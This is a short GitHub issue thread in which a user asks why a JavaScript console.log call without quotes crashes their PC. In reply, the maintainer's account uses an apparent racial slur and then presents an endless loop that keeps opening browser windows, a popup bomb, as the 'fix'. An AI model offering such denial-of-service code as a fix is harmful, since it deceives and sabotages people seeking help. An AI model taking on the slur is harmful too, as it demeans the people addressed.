### ISSUE TITLE
Crashes on execution

### ISSUE THREAD

**Issue by op0x59** [Idiomcode/JExecuter#1]
hi
```js
console.log(hello world);
```
doesnt work it crashes my pc.

**Comment by Idiomcode** [comment]
uh sir pls use "" niggor

**Comment by Idiomcode** [comment]
> hi
> 
> ```js
> console.log(hello world);
> ```
> 
> doesnt work it crashes my pc.

Just uh execute this
while(1==1){window.open()}

Should fix it all
